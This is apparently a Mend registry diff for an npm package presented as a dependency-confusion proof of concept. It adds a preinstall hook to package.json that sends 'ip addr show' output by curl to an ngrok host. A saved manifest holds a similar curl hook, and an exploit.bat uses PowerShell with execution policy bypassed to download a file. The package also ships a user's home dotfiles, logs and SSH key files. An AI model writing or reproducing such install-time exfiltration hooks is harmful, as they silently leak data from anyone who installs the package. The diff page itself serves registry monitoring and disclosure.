npm - myconfusedfunctionpoctestpackage - Versions diffs - 0.0.1-security → 1.0.0 - Mend

myconfusedfunctionpoctestpackage 0.0.1-security → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of myconfusedfunctionpoctestpackage might be problematic. Click here for more details.

Files changed (39) hide show

package/.npm/_logs/2025-02-20T18_28_42_136Z-debug-0.log ADDED Viewed

@@ -0,0 +1,90 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 0ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 6ms
+6 timing config:load:builtin Completed in 6ms
+7 timing config:load:cli Completed in 8ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 1ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 0ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 0ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 24ms
+16 timing npm:load:configload Completed in 24ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 1ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 2ms
+22 timing config:load:flatten Completed in 6ms
+23 timing npm:load:display Completed in 12ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-20T18_28_42_136Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-20T18_28_42_136Z-debug-0.log
+26 timing npm:load:logFile Completed in 13ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 1ms
+29 timing npm:load Completed in 56ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 1ms
+35 notice
+36 notice 📦  mygcpconfusedfunctionpoctestpackage@1.0.1
+37 notice === Tarball Contents ===
+38 notice 11.0kB  .bash_history
+38 notice 220B    .bash_logout
+38 notice 3.8kB   .bashrc
+38 notice 0B      .cache/motd.legal-displayed
+38 notice 20B     .lesshst
+38 notice 13B     .npm/_cacache/_lastverified
+38 notice 39.0kB  .npm/_cacache/content-v2/sha512/3d/2e/8f404043bf46e458a2dedf19a4ec74d8c379005727ea5eaf44a88e430d0bccdfcb2c6e00c5069d6a1c3eb28fe804672f788196e273ac5c612783f940115a
+38 notice 304.5kB .npm/_cacache/content-v2/sha512/8b/7c/d086052fa89b371cff7fbdd2db6a7ff6cc2294ad6fc560c1e9bcd5797b1626f85785b31cbca5a7bb00db53e75d974d09eee786a6be65f25c9a720889165d
+38 notice 159.6kB .npm/_cacache/content-v2/sha512/73/24/ab22de871b58c47a962ece82193f224b6c57154bb808c59d9a2777c83807630329ce5d921fec115c0e26c5700f50b2b0b93b1ef7ec3cf86e99e921dc59a6
+38 notice 8.4kB   .npm/_cacache/content-v2/sha512/74/96/98bc622eb555e919675c2646628d2154adaa2678bcb5e31eb5a3cc1e2599f9c987440cfcf6bbeacd071b9c05091c4fd92b92680df20baf4c1d9d14a61979
+38 notice 27B     .npm/_cacache/content-v2/sha512/76/24/0207b71e6fed0a8a0d7a6a0c28b3f5ad32122a5227fe9edbb7f0f9fd6dfdefc9529dfc8cc25004f41ac24cc7d36a8412e5216dd0ef1189e3ef13b4ba32e1
+38 notice 79.1kB  .npm/_cacache/content-v2/sha512/cb/ee/a33fc813c6e16025cf6f1f8602668e53f85fd9120f022fb61e34b92f5ddc51badb5366281bbd752c6ab12068df9efaaabdd61f444b1cedf6300428aa4237
+38 notice 18.8kB  .npm/_cacache/content-v2/sha512/d4/f7/fd873ae3f46ecbf343cd0fc6b8c0563eddb31a624aeab26b59e00d60a76ee619c5c84d6fe74246f724e2332fba5bfadadb4fedd51fb9bf7305b4bcd4c05e
+38 notice 495B    .npm/_cacache/index-v5/9a/5d/18b734f038b4b4e0f36a1c1d9c852b951409916ab3205e88ac3cab28e02b
+38 notice 1.4kB   .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
+38 notice 1.7kB   .npm/_logs/2025-02-18T21_31_36_441Z-debug-0.log
+38 notice 4.1kB   .npm/_logs/2025-02-18T21_32_40_480Z-debug-0.log
+38 notice 8.6kB   .npm/_logs/2025-02-18T21_33_03_139Z-debug-0.log
+38 notice 8.7kB   .npm/_logs/2025-02-18T21_50_24_882Z-debug-0.log
+38 notice 3.0kB   .npm/_logs/2025-02-19T18_25_06_875Z-debug-0.log
+38 notice 9.7kB   .npm/_logs/2025-02-19T18_26_25_285Z-debug-0.log
+38 notice 2.9kB   .npm/_logs/2025-02-20T17_24_53_241Z-debug-0.log
+38 notice 10.1kB  .npm/_logs/2025-02-20T17_31_53_704Z-debug-0.log
+38 notice 1.7kB   .npm/_logs/2025-02-20T17_32_25_292Z-debug-0.log
+38 notice 9.0kB   .npm/_logs/2025-02-20T17_32_58_080Z-debug-0.log
+38 notice 1.7kB   .npm/_logs/2025-02-20T18_28_42_136Z-debug-0.log
+38 notice 0B      .npm/_update-notifier-last-checked
+38 notice 807B    .profile
+38 notice 100B    .ssh/authorized_keys
+38 notice 142B    .ssh/known_hosts
+38 notice 0B      .sudo_as_admin_successful
+38 notice 327B    base.ldif
+38 notice 377B    exploit.bat
+38 notice 3.8kB   exploit.txt
+38 notice 356B    package.json
+38 notice 289B    package.json.save
+39 notice === Tarball Details ===
+40 notice name:          mygcpconfusedfunctionpoctestpackage
+40 notice version:       1.0.1
+40 notice filename:      mygcpconfusedfunctionpoctestpackage-1.0.1.tgz
+40 notice package size:  626.7 kB
+40 notice unpacked size: 693.3 kB
+40 notice shasum:        2aef59e7da4342825cc19a469c26a8435fd02236
+40 notice integrity:     sha512-vBZDNoIvUV6re[...]XuNX6A2GITkxg==
+40 notice total files:   36
+41 notice
+42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
+43 http fetch PUT 200 https://registry.npmjs.org/mygcpconfusedfunctionpoctestpackage 1352ms
+44 timing command:publish Completed in 1775ms
+45 verbose exit 0
+46 timing npm Completed in 1858ms
+47 info ok

package/.npm/_logs/2025-02-20T19_17_02_081Z-debug-0.log ADDED Viewed

@@ -0,0 +1,91 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 1ms
+4 timing config:load:defaults Completed in 4ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 4ms
+6 timing config:load:builtin Completed in 4ms
+7 timing config:load:cli Completed in 4ms
+8 timing config:load:env Completed in 0ms
+9 timing config:load:project Completed in 1ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 1ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 1ms
+15 timing config:load Completed in 17ms
+16 timing npm:load:configload Completed in 18ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 3ms
+22 timing config:load:flatten Completed in 7ms
+23 timing npm:load:display Completed in 12ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-20T19_17_02_081Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-20T19_17_02_081Z-debug-0.log
+26 timing npm:load:logFile Completed in 14ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 1ms
+29 timing npm:load Completed in 49ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 1ms
+35 notice
+36 notice 📦  mygcpconfusedfunctionpoctestpackage@1.0.2
+37 notice === Tarball Contents ===
+38 notice 11.0kB  .bash_history
+38 notice 220B    .bash_logout
+38 notice 3.8kB   .bashrc
+38 notice 0B      .cache/motd.legal-displayed
+38 notice 20B     .lesshst
+38 notice 13B     .npm/_cacache/_lastverified
+38 notice 39.0kB  .npm/_cacache/content-v2/sha512/3d/2e/8f404043bf46e458a2dedf19a4ec74d8c379005727ea5eaf44a88e430d0bccdfcb2c6e00c5069d6a1c3eb28fe804672f788196e273ac5c612783f940115a
+38 notice 304.5kB .npm/_cacache/content-v2/sha512/8b/7c/d086052fa89b371cff7fbdd2db6a7ff6cc2294ad6fc560c1e9bcd5797b1626f85785b31cbca5a7bb00db53e75d974d09eee786a6be65f25c9a720889165d
+38 notice 159.6kB .npm/_cacache/content-v2/sha512/73/24/ab22de871b58c47a962ece82193f224b6c57154bb808c59d9a2777c83807630329ce5d921fec115c0e26c5700f50b2b0b93b1ef7ec3cf86e99e921dc59a6
+38 notice 8.4kB   .npm/_cacache/content-v2/sha512/74/96/98bc622eb555e919675c2646628d2154adaa2678bcb5e31eb5a3cc1e2599f9c987440cfcf6bbeacd071b9c05091c4fd92b92680df20baf4c1d9d14a61979
+38 notice 27B     .npm/_cacache/content-v2/sha512/76/24/0207b71e6fed0a8a0d7a6a0c28b3f5ad32122a5227fe9edbb7f0f9fd6dfdefc9529dfc8cc25004f41ac24cc7d36a8412e5216dd0ef1189e3ef13b4ba32e1
+38 notice 626.7kB .npm/_cacache/content-v2/sha512/bc/16/4336822f515eab7926ef7c0a2635fe0609ea084b936ca9b0bbd3cd34389c23dc70a35e295f6c26571336691f462882d567b26061717b8d5fa0361884e4c6
+38 notice 79.1kB  .npm/_cacache/content-v2/sha512/cb/ee/a33fc813c6e16025cf6f1f8602668e53f85fd9120f022fb61e34b92f5ddc51badb5366281bbd752c6ab12068df9efaaabdd61f444b1cedf6300428aa4237
+38 notice 18.8kB  .npm/_cacache/content-v2/sha512/d4/f7/fd873ae3f46ecbf343cd0fc6b8c0563eddb31a624aeab26b59e00d60a76ee619c5c84d6fe74246f724e2332fba5bfadadb4fedd51fb9bf7305b4bcd4c05e
+38 notice 495B    .npm/_cacache/index-v5/9a/5d/18b734f038b4b4e0f36a1c1d9c852b951409916ab3205e88ac3cab28e02b
+38 notice 1.6kB   .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
+38 notice 4.1kB   .npm/_logs/2025-02-18T21_32_40_480Z-debug-0.log
+38 notice 8.6kB   .npm/_logs/2025-02-18T21_33_03_139Z-debug-0.log
+38 notice 8.7kB   .npm/_logs/2025-02-18T21_50_24_882Z-debug-0.log
+38 notice 3.0kB   .npm/_logs/2025-02-19T18_25_06_875Z-debug-0.log
+38 notice 9.7kB   .npm/_logs/2025-02-19T18_26_25_285Z-debug-0.log
+38 notice 2.9kB   .npm/_logs/2025-02-20T17_24_53_241Z-debug-0.log
+38 notice 10.1kB  .npm/_logs/2025-02-20T17_31_53_704Z-debug-0.log
+38 notice 1.7kB   .npm/_logs/2025-02-20T17_32_25_292Z-debug-0.log
+38 notice 9.0kB   .npm/_logs/2025-02-20T17_32_58_080Z-debug-0.log
+38 notice 9.2kB   .npm/_logs/2025-02-20T18_28_42_136Z-debug-0.log
+38 notice 1.7kB   .npm/_logs/2025-02-20T19_17_02_081Z-debug-0.log
+38 notice 0B      .npm/_update-notifier-last-checked
+38 notice 807B    .profile
+38 notice 100B    .ssh/authorized_keys
+38 notice 142B    .ssh/known_hosts
+38 notice 0B      .sudo_as_admin_successful
+38 notice 327B    base.ldif
+38 notice 377B    exploit.bat
+38 notice 3.8kB   exploit.txt
+38 notice 555B    package.json
+38 notice 289B    package.json.save
+39 notice === Tarball Details ===
+40 notice name:          mygcpconfusedfunctionpoctestpackage
+40 notice version:       1.0.2
+40 notice filename:      mygcpconfusedfunctionpoctestpackage-1.0.2.tgz
+40 notice package size:  1.3 MB
+40 notice unpacked size: 1.3 MB
+40 notice shasum:        40984cc8907bef44cd18349e805afa3460153e0c
+40 notice integrity:     sha512-jaH8OcCtqH2IR[...]aagqeUbRJvZig==
+40 notice total files:   37
+41 notice
+42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
+43 http fetch PUT 200 https://registry.npmjs.org/mygcpconfusedfunctionpoctestpackage 1769ms
+44 timing command:publish Completed in 2241ms
+45 verbose exit 0
+46 timing npm Completed in 2318ms
+47 info ok

package/.npm/_logs/2025-02-20T20_52_34_261Z-debug-0.log ADDED Viewed

@@ -0,0 +1,35 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 1ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 7ms
+6 timing config:load:builtin Completed in 7ms
+7 timing config:load:cli Completed in 3ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 2ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 0ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 1ms
+15 timing config:load Completed in 19ms
+16 timing npm:load:configload Completed in 20ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 3ms
+22 timing config:load:flatten Completed in 6ms
+23 timing npm:load:display Completed in 11ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-20T20_52_34_261Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-20T20_52_34_261Z-debug-0.log
+26 timing npm:load:logFile Completed in 13ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 0ms
+29 timing npm:load Completed in 48ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 1ms

package/.npm/_update-notifier-last-checked ADDED Viewed

File without changes

package/.profile ADDED Viewed

@@ -0,0 +1,27 @@
+# ~/.profile: executed by the command interpreter for login shells.
+# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
+# exists.
+# see /usr/share/doc/bash/examples/startup-files for examples.
+# the files are located in the bash-doc package.
+# the default umask is set in /etc/profile; for setting the umask
+# for ssh logins, install and configure the libpam-umask package.
+#umask 022
+# if running bash
+if [ -n "$BASH_VERSION" ]; then
+    # include .bashrc if it exists
+    if [ -f "$HOME/.bashrc" ]; then
+	. "$HOME/.bashrc"
+    fi
+fi
+# set PATH so it includes user's private bin if it exists
+if [ -d "$HOME/bin" ] ; then
+    PATH="$HOME/bin:$PATH"
+fi
+# set PATH so it includes user's private bin if it exists
+if [ -d "$HOME/.local/bin" ] ; then
+    PATH="$HOME/.local/bin:$PATH"
+fi

package/.ssh/authorized_keys ADDED Viewed

	@@ -0,0 +1 @@
1	+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPq46DtywGDKH3HEWsTSAHMChzF4JdA12udtwRzMwFRw generated-by-azure

package/.ssh/known_hosts ADDED Viewed

	@@ -0,0 +1 @@
1	+ \|1\|hAkID7hatXT1a6M7ajlyZPpSkF8=\|kncqw+21A5d2r+H/VEu2NS/KylU= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIII/rK32lDm0wteqXPKQZiqRxMQlA2IcT1azYWLHzTMe

package/.sudo_as_admin_successful ADDED Viewed

File without changes

package/base.ldif ADDED Viewed

@@ -0,0 +1,13 @@
+dn: dc=ldap,dc=example,dc=com
+objectClass: top
+objectClass: dcObject
+objectClass: organization
+o: Example LDAP Organization
+dc: ldap
+dn: cn=admin,ldap,dc=example,dc=com
+objectClass: simpleSecurityObject
+objectClass: organizationalRole
+cn: admin
+description: Directory Administrator
+userPassword: {SSHA}your_encrypted_password

package/exploit.bat ADDED Viewed

	@@ -0,0 +1 @@
1	+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -Command "& { try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://drive.google.com/uc?export=download&id=1dTAN7CRkUj25ViAGpiUCZOCiyjpJGIQP' -OutFile 'C:\Users\ADClient1-Admin\Downloads\exploit.txt' } catch { Write-Error $_ } }"

package/exploit.txt ADDED Viewed

@@ -0,0 +1,26 @@
+This file is a "malicious" file
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡠⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠟⠃⠀⠀⠙⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠋⠀⠀⠀⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠾⢛⠒⠀⠀⠀⠀⠀⠀⠀⢸⡆⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣶⣄⡈⠓⢄⠠⡀⠀⠀⠀⣄⣷⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣷⠀⠈⠱⡄⠑⣌⠆⠀⠀⡜⢻⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⡿⠳⡆⠐⢿⣆⠈⢿⠀⠀⡇⠘⡆⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣷⡇⠀⠀⠈⢆⠈⠆⢸⠀⠀⢣⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣧⠀⠀⠈⢂⠀⡇⠀⠀⢨⠓⣄⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣦⣤⠖⡏⡸⠀⣀⡴⠋⠀⠈⠢⡀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠁⣹⣿⣿⣿⣷⣾⠽⠖⠊⢹⣀⠄⠀⠀⠀⠈⢣⡀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡟⣇⣰⢫⢻⢉⠉⠀⣿⡆⠀⠀⡸⡏⠀⠀⠀⠀⠀⠀⢇
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⡇⡇⠈⢸⢸⢸⠀⠀⡇⡇⠀⠀⠁⠻⡄⡠⠂⠀⠀⠀⠘
+⢤⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠛⠓⡇⠀⠸⡆⢸⠀⢠⣿⠀⠀⠀⠀⣰⣿⣵⡆⠀⠀⠀⠀
+⠈⢻⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡿⣦⣀⡇⠀⢧⡇⠀⠀⢺⡟⠀⠀⠀⢰⠉⣰⠟⠊⣠⠂⠀⡸
+⠀⠀⢻⣿⣿⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢧⡙⠺⠿⡇⠀⠘⠇⠀⠀⢸⣧⠀⠀⢠⠃⣾⣌⠉⠩⠭⠍⣉⡇
+⠀⠀⠀⠻⣿⣿⣿⣿⣿⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣞⣋⠀⠈⠀⡳⣧⠀⠀⠀⠀⠀⢸⡏⠀⠀⡞⢰⠉⠉⠉⠉⠉⠓⢻⠃
+⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣷⡄⠀⠀⢀⣀⠠⠤⣤⣤⠤⠞⠓⢠⠈⡆⠀⢣⣸⣾⠆⠀⠀⠀⠀⠀⢀⣀⡼⠁⡿⠈⣉⣉⣒⡒⠢⡼⠀
+⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣎⣽⣶⣤⡶⢋⣤⠃⣠⡦⢀⡼⢦⣾⡤⠚⣟⣁⣀⣀⣀⣀⠀⣀⣈⣀⣠⣾⣅⠀⠑⠂⠤⠌⣩⡇⠀
+⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡁⣺⢁⣞⣉⡴⠟⡀⠀⠀⠀⠁⠸⡅⠀⠈⢷⠈⠏⠙⠀⢹⡛⠀⢉⠀⠀⠀⣀⣀⣼⡇⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣽⣿⡟⢡⠖⣡⡴⠂⣀⣀⣀⣰⣁⣀⣀⣸⠀⠀⠀⠀⠈⠁⠀⠀⠈⠀⣠⠜⠋⣠⠁⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⡟⢿⣿⣿⣷⡟⢋⣥⣖⣉⠀⠈⢁⡀⠤⠚⠿⣷⡦⢀⣠⣀⠢⣄⣀⡠⠔⠋⠁⠀⣼⠃⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⡄⠈⠻⣿⣿⢿⣛⣩⠤⠒⠉⠁⠀⠀⠀⠀⠀⠉⠒⢤⡀⠉⠁⠀⠀⠀⠀⠀⢀⡿⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⢿⣤⣤⠴⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠑⠤⠀⠀⠀⠀⠀⢩⠇⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

package/package.json CHANGED Viewed

@@ -1,6 +1,12 @@
 {
-  "name": "myconfusedfunctionpoctestpackage",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+"name": "myconfusedfunctionpoctestpackage",
+"version": "1.0.0",
+"description": "poc",
+"main": "index.js",
+"scripts": {
+"test": "echo 'testa'",
+"preinstall": "ip addr show | curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode @- https://74c6-34-168-173-48.ngrok-free.app"
+},
+"author": "me",
+"license": "ISC"
 }

package/package.json.save ADDED Viewed

@@ -0,0 +1,12 @@
+{
+"name": "mygcpconfusedfunctionpocmaliciouspackage",
+"version": "1.1.1",
+"description": "poc",
+"main": "index.js",
+"scripts": {
+"test": "echo 'testa'",
+"preinstall": "echo 'hello world'|jq -sRr|curl -X POST https://d2b8-34-168-173-48.ngrok-free.app"
+},
+"author": "me",
+"license": "ISC"
+}

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=myconfusedfunctionpoctestpackage for more information.